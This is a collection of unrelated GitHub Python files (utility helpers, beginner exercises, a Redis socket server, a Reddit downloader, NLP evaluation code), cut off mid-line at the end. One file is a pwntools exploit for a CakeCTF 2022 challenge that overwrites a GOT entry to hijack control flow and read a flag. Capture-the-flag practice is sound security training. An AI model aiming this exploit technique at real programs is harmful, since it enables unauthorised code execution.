+{"seq_id":"15757852182","text":"from functools import reduce\nfrom operator import or_\nfrom sys import version_info\n\n\n__api__ = [\n\t'merge', 'merge_with',\n\t'Init',\n\t'Exit'\n]\n__all__ = __api__\n\n\ndef merge(*dicts):\n\t\"\"\"Merge 2 or more dictionaries.\"\"\"\n\treturn {k : reduce(lambda d,x: x.get(k, d), dicts, None) for k in reduce(or_, map(lambda x: x.keys(), dicts), set()) }\n\ndef merge_with(f, *dicts):\n\t\"\"\"Merge 2 or more dictionaries. Apply function f to each element during merge.\"\"\"\n\treturn {k : reduce(lambda x: f(*x) if (len(x) > 1) else x[0])([ d[k] for d in dicts if k in d ]) for k in reduce(or_, map(lambda x: x.keys(), dicts), set()) }\n\n\nclass Init:\n\t@classmethod\n\tdef init(cls):\n\t\tfrom colorama import init\n\n\t\tinit()#strip=False)\n\t\t# print(Background.BLACK, end=\"\")\n\n\tfrom colorama import Fore as Foreground\n\tForeground = {\n\t\t\"RED\": Foreground.LIGHTRED_EX,\n\t\t\"DARK_RED\":\t\t Foreground.RED,\n\t\t\"GREEN\": Foreground.LIGHTGREEN_EX,\n\t\t\"DARK_GREEN\": Foreground.GREEN,\n\t\t\"YELLOW\": Foreground.LIGHTYELLOW_EX,\n\t\t\"DARK_YELLOW\": Foreground.YELLOW,\n\t\t\"MAGENTA\": Foreground.LIGHTMAGENTA_EX,\n\t\t\"BLUE\": Foreground.LIGHTBLUE_EX,\n\t\t\"CYAN\": Foreground.LIGHTCYAN_EX,\n\t\t\"DARK_CYAN\": Foreground.CYAN,\n\t\t\"GRAY\": Foreground.WHITE,\n\t\t\"DARK_GRAY\": Foreground.LIGHTBLACK_EX,\n\t\t\"WHITE\": Foreground.LIGHTWHITE_EX,\n\t\t\"NOCOLOR\": Foreground.RESET,\n\n\t\t\"HEADLINE\": Foreground.LIGHTMAGENTA_EX,\n\t\t\"ERROR\": Foreground.LIGHTRED_EX,\n\t\t\"WARNING\": Foreground.LIGHTYELLOW_EX\n\t}\n\nclass Exit:\n\t@classmethod\n\tdef exit(cls, returnCode=0):\n\t\tfrom colorama import Fore as Foreground, Back as Background, Style\n\t\tprint(Foreground.RESET + Background.RESET + Style.RESET_ALL, end=\"\")\n\t\texit(returnCode)\n\n\t@classmethod\n\tdef versionCheck(cls, version):\n\t\tif (version_info < version):\n\t\t\tInit.init()\n\t\t\tprint(\"{RED}ERROR:{NOCOLOR} Used Python interpreter is to old ({version}).\".format(version=version_info, **Init.Foreground))\n\t\t\tprint(\" Minimal required Python version is {version}\".format(version=\".\".join(version)))\n\t\t\tcls.exit(1)\n\n\t@classmethod\n\tdef printException(cls, ex):\n\t\tfrom traceback import print_tb, walk_tb\n\t\tInit.init()\n\t\tprint(\"{RED}FATAL: An unknown or unhandled exception reached the topmost exception handler!{NOCOLOR}\".format(**Init.Foreground))\n\t\tprint(\"{YELLOW} Exception type:{NOCOLOR} {typename}\".format(typename=ex.__class__.__name__, **Init.Foreground))\n\t\tprint(\"{YELLOW} Exception message:{NOCOLOR} {message!s}\".format(message=ex, **Init.Foreground))\n\t\tframe,sourceLine = [x for x in walk_tb(ex.__traceback__)][-1]\n\t\tfilename = frame.f_code.co_filename\n\t\tfuncName = frame.f_code.co_name\n\t\tprint(\"{YELLOW} Caused in:{NOCOLOR} {function} in file '{filename}' at line {line}\".format(function=funcName, filename=filename, line=sourceLine, **Init.Foreground))\n\t\tif (ex.__cause__ is not None):\n\t\t\tprint(\"{DARK_YELLOW} Caused by type:{NOCOLOR} {typename}\".format(typename=ex.__cause__.__class__.__name__, **Init.Foreground))\n\t\t\tprint(\"{DARK_YELLOW} Caused by message:{NOCOLOR} {message!s}\".format(message=ex.__cause__, **Init.Foreground))\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint_tb(ex.__traceback__)\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint((\"{RED}Please report this bug at GitHub: https://github.com/VLSI-EDA/pyIPCMI/issues{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tExit.exit(1)\n\n\t@classmethod\n\tdef printNotImplementedError(cls, ex):\n\t\tfrom traceback import walk_tb\n\t\tInit.init()\n\t\tframe, _ = [x for x in walk_tb(ex.__traceback__)][-1]\n\t\tfilename = frame.f_code.co_filename\n\t\tfuncName = frame.f_code.co_name\n\t\tprint(\"{RED}NOT IMPLEMENTED:{NOCOLOR} {function} in file '{filename}': {message!s}\".format(function=funcName, filename=filename, message=ex, **Init.Foreground))\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint((\"{RED}Please report this bug at GitHub: https://github.com/VLSI-EDA/pyIPCMI/issues{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tExit.exit(1)\n\n\t@classmethod\n\tdef printExceptionBase(cls, ex):\n\t\tInit.init()\n\t\tprint(\"{RED}FATAL: A known but unhandled exception reached the topmost exception handler!{NOCOLOR}\".format(**Init.Foreground))\n\t\tprint(\"{RED}ERROR:{NOCOLOR} {message}\".format(message=ex.message, **Init.Foreground))\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint((\"{RED}Please report this bug at GitHub: https://github.com/VLSI-EDA/pyIPCMI/issues{NOCOLOR}\").format(**Init.Foreground))\n\t\tprint((\"{RED}\" + (\"-\" * 80) + \"{NOCOLOR}\").format(**Init.Foreground))\n\t\tExit.exit(1)\n\n\t@classmethod\n\tdef printPlatformNotSupportedException(cls, ex):\n\t\tInit.init()\n\t\tprint(\"{RED}ERROR:{NOCOLOR} Unsupported platform '{message}'\".format(message=ex.message, **Init.Foreground))\n\t\tExit.exit(1)\n\n\t@classmethod\n\tdef printEnvironmentException(cls, ex):\n\t\tInit.init()\n\t\tprint(\"{RED}ERROR:{NOCOLOR} {message}\".format(message=ex.message, **Init.Foreground))\n\t\tprint(\" Please run this script with it's provided wrapper ('pyIPCMI.[sh/ps1]') or manually load the required environment before executing this script.\")\n\t\tExit.exit(1)\n\n\t@classmethod\n\tdef printNotConfiguredException(cls, ex):\n\t\tInit.init()\n\t\tprint(\"{RED}ERROR:{NOCOLOR} {message}\".format(message=ex.message, **Init.Foreground))\n\t\tprint(\" Please run {YELLOW}'pyIPCMI.[sh/ps1] configure'{NOCOLOR} in pyIPCMI's root directory.\".format(**Init.Foreground))\n\t\tExit.exit(1)\n","repo_name":"Paebbels/pyIPCMI","sub_path":"lib/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
+{"seq_id":"20821214977","text":"x = input(\"정수를 입력하시오: \")\ni1 = len(x)\ni1 = int(i1)\ny = x\nx = int(x)\ns = str(x)\ni = i1\nsum = 0\nwhile i >= 0:\n a = 10**i\n p = x//a\n x = x-(p*a)\n sum = sum+p\n i = i-1\nprint(sum)\n\n\n# 작업 순서\n# 1. 문자열 정수의 길이를 구한다.\n# 2. 0부터 길이 -1 까지 1씩 증가시키면서\n# 2-1. 문자 한개를 꺼내 정수로 변환\n# 2-2 sum+정수 를 한다.\n\n# for문\nsum = 0\nfor y1 in range(0, i1, 1):\n y2 = int(y[y1])\n sum = sum+y2\nprint(sum)\n\n\n# 반복문\nsum = 0\ny1 = 0\nwhile y1 < i1:\n y2 = int(y[y1])\n sum = sum+y2\n y1 = y1+1\nprint(sum)\n","repo_name":"parky83/python0209","sub_path":"st01.Python기초/py08반복문/py08_15_자리수의합.py","file_name":"py08_15_자리수의합.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34026957593","text":"#!/usr/bin/env python3\n\nimport socketserver\nimport redis\nimport json\nimport sys\nimport pickle\n\nr = redis.StrictRedis(host='localhost', port=6379, db=0)\n#d = {}\n#r.set('lab6map', json.dumps(d))\n#g = r.hm('lab6map')\n#print(g)\n#unpacked = json.loads(g.decode('utf-8'))\n\nclass Handler(socketserver.StreamRequestHandler):\n def handle(self):\n self.data = self.rfile.readline().strip()\n print(\"{} sent:\".format(self.client_address[0]))\n string = self.data.decode('utf-8')\n js = json.loads(string)\n #js is a dict\n token = next(iter(js.keys()))\n scores = js[token]\n if r.hexists('lab6map', token):\n cur = json.loads(r.hget('lab6map', token).decode('utf-8'))\n print(\"token\", js[token], cur)\n for x in [\"1\", \"2\", \"3\", \"4\"]:\n if x not in cur and x not in js[token]:\n js[token][x] = \"-1\"\n for x in [\"1\", \"2\", \"3\", \"4\"]:\n if x not in js[token]:\n js[token][x] = cur[x]\n print(\"token\", js[token])\n else:\n for x in [\"1\", \"2\", \"3\", \"4\"]:\n if x not in js[token]:\n js[token][x] = \"-1\"\n st = json.dumps(js[token])\n print(st)\n r.hmset('lab6map', {token: st})\n\n cur = r.hgetall('lab6map')\n print(\"Scores now: \" + str(cur))\n #self.request.sendall(bytes(scores))\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n port = 5858\n else:\n port = int(sys.argv[1])\n HOST, PORT = \"0.0.0.0\", port\n server = socketserver.TCPServer((HOST, PORT), Handler)\n server.serve_forever()\n","repo_name":"austinschwartz/codegen-server","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34643336000","text":"import os\nimport uvicorn\n\nfrom pathlib import Path\nfrom fastapi import FastAPI, Request\nfrom fastapi.templating import Jinja2Templates\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory='templates/')\n\nBASE_DIR = Path(__file__).resolve().parent\ntemplates = Jinja2Templates(directory=str(Path(BASE_DIR, 'templates')))\n\n\n@app.get('/')\ndef index(request: Request):\n background_color = os.getenv(\"BACKGROUND_COLOR\", \"red\")\n message = os.getenv(\"MESSAGE\", \"This is default message\")\n\n return templates.TemplateResponse(\n 'index.html',\n context={'request': request, 'background_color': background_color, \"message\": message}\n )\n\nif __name__ == \"__main__\":\n uvicorn.run(\"main:app\", host=\"0.0.0.0\", port=8000)\n","repo_name":"cartovarc/colorfull-app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"32689427721","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*\n\nfrom pwn import *\nfrom sys import argv\nfrom time import sleep\n\ncontext.terminal = ['tmux', 'sp', '-h']\ncontext.log_level = \"debug\"\n\nchall = \"./chall\"\n#libc = ELF()\nelf = ELF(chall)\ncontext.binary = chall\ncontext.binary.checksec()\n\nif len(argv) >= 2 and argv[1] == \"r\":\n p = remote(\"pwn1.2022.cakectf.com\", 9003)\nelif len(argv) >= 2 and argv[1] == \"d\":\n\tcmd = \"\"\"\n\t\tc\n\t\"\"\"\n\tp = gdb.debug(chall,cmd)\nelse:\n p = process(chall)\n\n\ndef set_c_str(buf):\n p.recvuntil(\"choice:\")\n p.sendline(\"1\")\n p.recvuntil(\"c_str:\")\n p.sendline(buf)\n\ndef get_c_str():\n p.recvuntil(\"choice:\")\n p.sendline(\"2\")\n p.recvuntil(\"c_str: \")\n return p.recvline().rstrip(b'\\n')\n\ndef set_str(buf):\n p.recvuntil(\"choice:\")\n p.sendline(\"3\")\n p.recvuntil(\"str:\")\n p.sendline(buf)\n\ndef get_str():\n p.recvuntil(\"choice:\")\n p.sendline(\"2\")\n p.recvuntil(\"str: \")\n return p.recvline().rstrip(b'\\n')\n\npayload = b'A' * 8\nset_str(payload)\n\npayload = b'B' * 8 * 4\npayload += p64(elf.got['_ZStrsIcSt11char_traitsIcESaIcEERSt13basic_istreamIT_T0_ES7_RNSt7__cxx1112basic_stringIS4_S5_T1_EE'])\nset_c_str(payload)\n\npayload = p64(elf.symbols['_ZN4Test7call_meEv'])\nset_str(payload)\n\npayload = b'cat flag-ba2a141e66fda88045dc28e72c0daf20.txt'\nset_str(payload)\n\np.interactive()\n","repo_name":"t3mp-0xCC/write-up","sub_path":"cakectf_2022/str_vs_cstr/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3208176352","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def insertIntoBST(self, root: TreeNode, val: int) -> TreeNode:\n if not root:\n return TreeNode(val)\n\n pos = root\n while pos:\n if val < pos.val:\n if not pos.left:\n pos.left = TreeNode(val)\n break\n else:\n pos = pos.left\n else:\n if not pos.right:\n pos.right = TreeNode(val)\n break\n else:\n pos = pos.right\n\n return root\n","repo_name":"foreverxujiahuan/algorithm","sub_path":"树/lc701.py","file_name":"lc701.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"71353843394","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\n\ndriver = webdriver.Chrome()\n\n# Open a web page\ndriver.get(\"https://www.example.com\")\n\ntext_input_field = driver.find_element_by_id(\"input_field_id\")\n\n# Create an ActionChains object\naction = ActionChains(driver)\n\n# Perform a keyboard event (typing text) in the input field\ntext_to_type = \"Hello, Selenium\"\naction.send_keys_to_element(text_input_field, text_to_type).perform()\n\n# Close the browser\ndriver.quit()","repo_name":"AmitBoricha/Web-automation-Selenium","sub_path":"keyboard_events.py","file_name":"keyboard_events.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72645377155","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\n\n# Input\ndata_folder = 'data/'\ncontact_points_name = 'contact_points.csv'\norientations_name = 'orientations.csv'\n\nformation_name_1 = 'layer1'\nx_1_alpha = np.array([10.0, 25.0, 40.0]) # x-coordinates of the interfaces of the first layer\nz_1_alpha = np.array([-2.0, -1.0, -2.5]) # z-coordinates of the interfaces of the first layer\n\nformation_name_2 = 'layer2'\nx_2_alpha = np.array([10.0, 25.0, 45.0]) # x-coordinates of the second layer\nz_2_alpha = np.array([-7.0, -8.5, -5.0]) # y-coordinates of the second layer\n\nx_beta = np.array([5.0, 15.0, 15.0, 30.0, 35.0]) # x-coordinates of the orientations\nz_beta = np.array([-5.0, -8.5, -4.0, -5.0, -8.0]) # z-coordinates of the orientations\nazimut_beta = np.array([270.0, 90.0, 270.0, 90.0, 270.0]) # azimuth of the orientations\ndip_beta = np.array([5.0, 25.0, 15.0, 25.0, 20.0]) # dip of the orientations\n\ntry:\n os.mkdir(data_folder)\nexcept:\n pass\n\n# Data frame generation: contact points\nformation_1_alpha = [formation_name_1] * len(x_1_alpha)\nformation_2_alpha = [formation_name_2] * len(x_2_alpha)\n\nd_contact = {'X': x_1_alpha.tolist() + x_2_alpha.tolist(),\n 'Y': np.zeros_like(x_1_alpha).tolist()+np.zeros_like(x_2_alpha).tolist(),\n 'Z': z_1_alpha.tolist() + z_2_alpha.tolist(), 'formation': formation_1_alpha + formation_2_alpha}\ndf_contact = pd.DataFrame(data=d_contact)\ndf_contact.to_csv(data_folder + contact_points_name, index=False) # save data frame\n\n# Data frame generation: orientations\nd_or = {'X': x_beta.tolist(),\n 'Y': 0.0 * (len(x_beta) + len(x_beta)),\n 'Z': z_beta.tolist(),\n 'azimuth': azimut_beta.tolist(),\n 'dip': dip_beta.tolist(),\n 'polarity': 1,\n 'formation': 'common'} # formation is not a necessary field\ndf_or = pd.DataFrame(data=d_or)\ndf_or.to_csv(data_folder + orientations_name, index=False) # save data frame\n\n# Plot data\nfig = plt.figure(figsize=(5, 2.0))\nax = fig.add_axes([0.2, 0.3, 0.4, 0.5])\nax.plot(x_1_alpha, z_1_alpha, 'ro', label='contact point\\nlayer 1')\nax.plot(x_2_alpha, z_2_alpha, 'bo', label='contact point\\nlayer 2')\n\nu_beta = np.zeros((len(x_beta), ))\nv_beta = np.zeros((len(x_beta), ))\nfor i, (azi, dipi) in enumerate(zip(azimut_beta, dip_beta)):\n u_beta[i] = np.sin(dipi * np.pi / 180.0) * np.sin(azi * np.pi / 180.0)\n v_beta[i] = np.cos(dipi * np.pi / 180.0)\n\nax.quiver(x_beta, z_beta, u_beta, v_beta, color='black', label='orientations')\n\nax.legend(bbox_to_anchor=(1.0, 1.05))\nax.set_xlabel('Distance X (m)')\nax.set_ylabel('Depth\\nZ (m)')\nax.set_ylim(-10, 0)\nax.set_xlim(0, 55.0)\n\n\n# Add labels to plot\nfor i, (x_1_alpha_i, z_1_alpha_i) in enumerate(zip(x_1_alpha, z_1_alpha)): # contact points layer1\n label = '$x_{1\\\\alpha' + str(i) + '}$'\n ax.text(x_1_alpha_i + 1.5, z_1_alpha_i, label)\n\nfor i, (x_2_alpha_i, z_2_alpha_i) in enumerate(zip(x_2_alpha, z_2_alpha)): # contact points layer2\n label = '$x_{2\\\\alpha' + str(i) + '}$'\n ax.text(x_2_alpha_i + 1.5, z_2_alpha_i, label)\n\nfor i, (x_beta_i, z_beta_i) in enumerate(zip(x_beta, z_beta)):\n label = '$x_{\\\\beta' + str(i + 1) + '}$'\n ax.text(x_beta_i + 1.5, z_beta_i, label)\n\nfig.savefig(data_folder + 'data.png', format='png', dpi=1200)\n\n\n# plt.show()\n","repo_name":"jc-olalla/Geometric-variability-of-soil-layers-via-universal-cokriging","sub_path":"data_generation.py","file_name":"data_generation.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"70106170114","text":"import re\n\nfilename = 'baladhuri_futuh.txt'\ntext = open(filename, mode='r', encoding='utf-8').read()\n\nword = 'فرضة'\nword_instances = re.findall(word, text)\nfreq_word = len(word_instances)\nfreq_word = str(freq_word)\nprint(word + ' appears ' + freq_word + ' times in this text')\n","repo_name":"jedlitools/find-for-me","sub_path":"ex8_word_frequency.py","file_name":"ex8_word_frequency.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"26530613542","text":"# -*- coding:utf-8 -*-\n# @Time : 2020/7/7 22:35 \n# @Author : bendan50\n# @File : Q209-min-sub-array-len.py \n# @Function : 长度最小的子数组\n# 给定一个含有 n 个正整数的数组和一个正整数 s ,找出该数组中满足其和 ≥ s 的长度最小的子数组,\n# 并返回其长度。如果不存在符合条件的子数组,返回 0。\n#\n# 输入:s = 7, nums = [2,3,1,2,4,3]\n# 输出:2\n# 解释:子数组 [4,3] 是该条件下的长度最小的子数组。\n# 输入 s = 213 nums = [12, 28, 83, 4, 25, 26, 25, 2, 25, 25, 25, 12]\n# 输出 8\n# 解释:子数组[83, 4, 25, 26, 25, 2, 25, 25]是该条件下长度最小的子数组\n# @Software: PyCharm\n\nclass Solution:\n def minSubArrayLen(self, s: int, nums) -> int:\n \"\"\"\n 思路:注意子数组的定义,因此不能排序!\n 暴力法:从第一个结点开始,往后累加,满足大于等于s后,记录长度,然后继续从第二个结点开始。\n 循环到数组尾,时间复杂度O(n^2)\n 改进:前后两个指针构建的滑动窗口。sum=nums[head]+...+nums[tail],个数为tail-head+1\n :param s:\n :param nums:\n :return:\n \"\"\"\n #第一步:一直往里加(头结点不变,尾结点往后移),直到满足大于等于s,\n head = tail = 0\n nums_len = len(nums)\n if nums_len == 0:\n return 0\n sum = 0\n ret = nums_len + 1 #子数组的长度,因为寻找最小长度,所以比数组长度大1,当结束时,小于等于数组长度说明有解。\n while tail < nums_len:\n if nums[tail] >= s:\n return 1\n sum += nums[tail]\n if sum >= s:\n #后移前指针\n while sum >= s and head <= tail:\n sum -= nums[head]\n head += 1\n ret = min(ret,tail-head+2) # +2是因为tail-head之间应该+1,但此时sum', '_')\n title = title.replace('|', '_')\n \n # Check the file extension to determine if it's an image or a video\n if url.endswith('.jpg') or url.endswith('.png'):\n response = requests.get(url)\n # Specify the path to the file in the folder\n file_path = os.path.join(post_path, f'{upvotes}_{title}.jpg')\n # Save the file to the specified path\n open(file_path, 'wb').write(response.content)\n\n if post.is_video:\n video_url = post.media['reddit_video']['fallback_url']\n response = requests.get(video_url)\n\n # Specify the path to the file in the folder\n file_path = os.path.join(video_path, f'{upvotes}_{title}.mp4')\n # Save the file to the specified path\n open(file_path, 'wb').write(response.content)","repo_name":"mirelconstantin/reddit-downloader","sub_path":"reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"31214627090","text":"from random import randint, choice\n\n\nTASK = 'What is the result of the expression?'\nSTART = 0\nEND = 1000\n\n\ndef get_question_answer():\n number_1 = randint(START, END)\n number_2 = randint(START, END)\n operators = '+', '-', '*'\n random_op = choice(operators)\n question_text = f'{number_1} {random_op} {number_2}'\n if random_op == '+':\n true_answer = number_1 + number_2\n elif random_op == '-':\n true_answer = number_1 - number_2\n elif random_op == '*':\n true_answer = number_1 * number_2\n return question_text, str(true_answer)\n","repo_name":"fyodor91/python-project-49","sub_path":"brain_games/games/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23427851871","text":"import sys\n\n\n\ndef best_option(C, F, X, R, A):\n\tbest = 10000000000000000000\n\tcurrent = 0\n\twhile R < 4*X:\n\n\t\twait_it_out = (X - A) / R\n\t\tif wait_it_out + current < best:\n\t\t\tbest = wait_it_out + current\n\n\t\tcurrent += (C-A) / R\n\t\tR += F\n\t\n\tif current + (X - A) / R < best:\n\t\treturn current + (X - A) / R\n\treturn best\n\ninp = open(sys.argv[1])\n\ncount = int(inp.readline())\n\nfor i in range(0, count):\n\tdata = inp.readline().rstrip().split(\" \")\n\tprint(\"Case #\" + str(i+1) + \": \" + str(best_option(float(data[0]), float(data[1]), float(data[2]), 2.0, 0.0)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/3429.py","file_name":"3429.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31180318828","text":"from pathlib import Path\nfrom tqdm import tqdm\nimport os\nfrom typing import List, Dict, Tuple\nimport re\nimport json\n\n\ndef read_jsonl_file(input_file: Path):\n with open(input_file, 'r') as input_json_file:\n for json_data in input_json_file:\n if json_data != \"\\n\":\n json_data = json.loads(json_data)\n yield (json_data[\"input\"], json_data[\"label\"])\n\n\ndef read_jsonl_files(input_file_list: List[Path]):\n inputs = []\n labels = []\n for input_file in input_file_list:\n for (input, label) in read_jsonl_file(input_file):\n inputs.append(input)\n labels.append(label)\n return (inputs, labels)\n\n\ndef print_format(file_object, input_text, label_text, predict_text):\n file_object.write(f\"input:{input_text}\\n\")\n file_object.write(f\"label:{label_text}\\n\")\n file_object.write(f\"predict:{predict_text}\\n\")\n\n\ndef retrieve_last_string(str: str) -> str:\n match = re.search(r\".*answer :\\s*(.+?) \", str)\n try:\n return match.group(1).replace(' ', '')\n except:\n return None\n\n\ndef clean_ids(ids, pad_id):\n cleaned_ids = [x for x in ids if x != pad_id]\n return cleaned_ids\n\n\ndef clean_html_tags(text: str) -> str:\n cleaned_text = re.sub(r\"\", \"\", text)\n cleaned_text = re.sub(r\"\", \"\", cleaned_text)\n cleaned_text = re.sub(r\"\", \"\", cleaned_text)\n return cleaned_text\n\n\ndef clean_text(text: str) -> str:\n cleaned_text = re.sub(\" \", \"\", (text))\n cleaned_text = clean_html_tags(cleaned_text)\n return cleaned_text\n\n\ndef retrieve_inference(text):\n #text = text.replace(' ', '')\n match = re.search(r\" .*?(.+?)answer\", text)\n try:\n return match.group(1)\n except:\n return None\n\n\ndef eliminate_calculated_index(calculated_list: List[int], test_inputs: List[str], test_labels: List[str]) -> Tuple[List[str], List[str], List[str]]:\n eliminated_test_inputs = []\n eliminated_test_labels = []\n\n for i, (calculated_index, input, label) in enumerate(zip(calculated_list, test_inputs, test_labels)):\n if calculated_index is None:\n eliminated_test_inputs.append(input)\n eliminated_test_labels.append(label)\n return (eliminated_test_inputs, eliminated_test_labels)\n\n\ndef check_step_by_step_skip_inference_err(input_text, label_inference):\n input_inference, _, predict_inference, _ = input_text.split(\"\")\n input_inference = re.sub(r\"calculate:\", \"\", input_inference)\n input_inference = re.sub(r\" \", \"\", input_inference)\n predict_inference = re.sub(r\" \", \"\", predict_inference)\n label_inference = re.sub(r\" \", \"\", label_inference)\n input_inference_list = input_inference.split(\",\")\n predict_inference_list = predict_inference.split(\",\")\n\n input_dict = {}\n for input in input_inference_list:\n if len(input.split(\"=\")) != 2:\n continue\n left_arg, right_arg = input.split(\"=\")\n if not right_arg.isdecimal():\n input_dict[left_arg] = right_arg\n\n first_step = True\n for predict in predict_inference_list:\n if len(predict.split(\"=\")) != 2:\n continue\n left_arg, right_arg = predict.split(\"=\")\n if first_step:\n first_step = False\n if right_arg != input_dict[left_arg]:\n return True\n if right_arg.isdecimal():\n first_step = True\n return False\n\n\ndef token_by_token_eliminate_calculated_index(last_token_list: List[int], test_inputs: List[str], test_labels: List[str]) -> Tuple[List[str], List[str], List[str]]:\n eliminated_test_inputs = []\n eliminated_test_labels = []\n\n for last_token_index, input, label in zip(last_token_list, test_inputs, test_labels):\n if not last_token_index:\n eliminated_test_inputs.append(input)\n eliminated_test_labels.append(label)\n return (eliminated_test_inputs, eliminated_test_labels)\n\n\ndef multi_decode(tokenizer, ids_list):\n decoded_list = []\n for ids in ids_list:\n decoded_text = tokenizer.decode(\n ids, skip_special_tokens=False, clean_up_tokenization_spaces=False)\n decoded_list.append(decoded_text)\n return decoded_list\n\n\ndef make_variable_dict(inference_list):\n variable_dict = {}\n for inference in inference_list:\n if len(inference.split(\"=\")) != 2:\n continue\n\n left_arg, right_arg = inference.split(\"=\")\n if right_arg.isdecimal():\n variable_dict[left_arg] = right_arg\n\n return variable_dict\n\n\n# predict\ndef all_at_once_predict(input_id_list, predict_id_list, label_id_list, tokenizer, output_dir, model_name) -> int:\n acc_num = 0\n inference_acc_num = 0\n analyze_file_path = Path(output_dir) / Path('analyze.txt')\n err_file_path = Path(output_dir) / Path('analyze_err.txt')\n inference_err_file_path = Path(\n output_dir) / Path('analyze_inference_err.txt')\n del_analyze_flag = True\n del_analyze_err_flag = True\n del_analyze_inference_err_flag = True\n label_length_list = []\n predict_length_list = []\n\n with open(analyze_file_path, 'w') as f, open(err_file_path, 'w') as f_err, open(inference_err_file_path, \"w\") as f_inference_err:\n for input_ids, predict_ids, label_ids in zip(input_id_list, predict_id_list, label_id_list):\n label_ids[label_ids == -100] = tokenizer.pad_token_id\n if model_name == \"bart\":\n input_text, label_text, predict_text = multi_decode(\n tokenizer, [input_ids, label_ids[1:], predict_ids[2:]])\n elif model_name == \"t5\":\n input_text, label_text, predict_text = multi_decode(\n tokenizer, [input_ids, label_ids, predict_ids[1:]])\n\n predict = retrieve_last_string(predict_text)\n label = retrieve_last_string(label_text)\n\n # calc inference length\n cleaned_label_text = clean_text(label_text)\n cleaned_predict_text = clean_text(predict_text)\n label_length_list.append(len(cleaned_label_text))\n predict_length_list.append(len(cleaned_predict_text))\n\n if predict is not None and (predict == label):\n acc_num += 1\n if cleaned_label_text == cleaned_predict_text:\n inference_acc_num += 1\n del_analyze_flag = False\n print_format(f, input_text, label_text, predict_text)\n else:\n del_analyze_inference_err_flag = False\n print_format(f_inference_err, input_text,\n label_text, predict_text)\n else:\n del_analyze_err_flag = False\n print_format(f_err, input_text, label_text, predict_text)\n\n if del_analyze_flag:\n os.remove(analyze_file_path)\n if del_analyze_err_flag:\n os.remove(err_file_path)\n if del_analyze_inference_err_flag:\n os.remove(inference_err_file_path)\n return acc_num, inference_acc_num, label_length_list, predict_length_list\n\n\ndef step_by_step_predict(input_id_list, predict_id_list, label_id_list, tokenizer, output_dir, step_index, model_name, label_length_list, predict_length_list):\n acc_num = 0\n inference_acc_num = 0\n calculated_list = []\n predict_text_list = []\n\n analyze_file_path = Path(output_dir) / Path(f'analyze_{step_index}.txt')\n err_file_path = Path(output_dir) / Path(f'analyze_err_{step_index}.txt')\n inference_err_file_path = Path(\n output_dir) / Path(f'analyze_inference_err_{step_index}.txt')\n over_file_path = Path(\n output_dir) / Path(f'analyze_over_err.txt')\n\n del_analyze_flag = True\n del_analyze_err_flag = True\n del_analyze_inference_err_flag = True\n\n with open(analyze_file_path, 'w') as f, open(err_file_path, 'w') as f_err, open(inference_err_file_path, \"w\") as f_inference_err:\n for input_ids, predict_ids, label_ids in zip(input_id_list, predict_id_list, label_id_list):\n label_ids[label_ids == -100] = tokenizer.pad_token_id\n if model_name == \"bart\":\n input_text, label_text, predict_text = multi_decode(\n tokenizer, [input_ids, label_ids[1:], predict_ids[2:]])\n elif model_name == \"t5\":\n input_text, label_text, predict_text = multi_decode(\n tokenizer, [input_ids, label_ids, predict_ids[1:]])\n predict_text_list.append(predict_text)\n\n predict = retrieve_last_string(predict_text)\n calculated_list.append(predict)\n label = retrieve_last_string(label_text)\n predict_inference = 